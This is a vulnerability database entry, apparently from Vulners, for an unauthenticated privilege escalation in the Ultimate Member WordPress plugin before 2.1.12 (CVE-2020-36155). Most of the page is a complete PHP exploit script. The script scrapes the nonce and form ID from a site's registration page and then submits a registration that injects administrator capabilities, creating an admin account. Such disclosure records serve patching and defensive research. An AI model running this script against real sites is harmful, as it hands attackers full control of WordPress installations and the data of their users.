Lucene search
+L

Ultimate Member < 2.1.12 - Unauthenticated Privilege Escalation via User Meta

🗓️ 09 Nov 2020 00:00:00Reported by Chloe ChamberlandType 
wpexploit
 wpexploit
👁 47 Views

Unauthenticated privilege escalation in Ultimate Member plugi

Related
Refs
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2020-36155
4 Jan 202118:15
attackerkb
circl
Circl
CVE-2020-36155
15 Sep 202516:48
circl
cnnvd
CNNVD
WordPress Security Vulnerabilities
4 Jan 202100:00
cnnvd
cve
CVE
CVE-2020-36155
4 Jan 202117:22
cve
cvelist
Cvelist
CVE-2020-36155
4 Jan 202117:22
cvelist
euvd
EUVD
EUVD-2020-23733
4 Jan 202117:22
euvd
nuclei
Nuclei
Ultimate Member < 2.1.12 - Unauthenticated Privilege Escalation via User Meta
20 Sep 202602:05
nuclei
nvd
NVD
CVE-2020-36155
4 Jan 202118:15
nvd
openvas
OpenVAS
WordPress Ultimate Member Plugin <= 2.1.11 Multiple Privilege Escalation Vulnerabilities
10 Nov 202000:00
openvas
prion
Prion
Privilege escalation
4 Jan 202118:15
prion
Rows per page
<?php

// Settings
$wp_url = $argv[1];
$username = $argv[2];
$name = $argv[3];
$lastname = $argv[4];
$email = $argv[5];
$um_role = $argv[6];

// Pull the Nonce
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/register');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

preg_match('/_wpnonce"\svalue="([^"]+)"/', $content, $matches);
$nonce = $matches[1];

// Pull the form_id
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/register');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

preg_match('/id=\"form_id_([^"]+)"/', $content, $matches);
$form_id = $matches[1];

// Update Settings
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/register');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'user_login-' . $form_id => $username,
    'first_name-'. $form_id => $name,
    'last_name-' . $form_id => $lastname,
    'user_email-' . $form_id => $email,
    'user_password-' . $form_id => 'StrongPassword123!',
    'confirm_user_password-' . $form_id => 'StrongPassword123!',
    'wp_capabilities[administrator]' => '',
    'form_id' => $form_id,
    'timestamp' => '1603399250',
    'um_request' => '',
    '_wpnonce' => $nonce,
    '_wp_http_referer' => 'register'

]);

$output = curl_exec($ch);
curl_close($ch);
print_r($output);

?>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Jan 2021 06:01Current
1.1Low risk
Vulners AI Score1.1
EPSS0.08975
47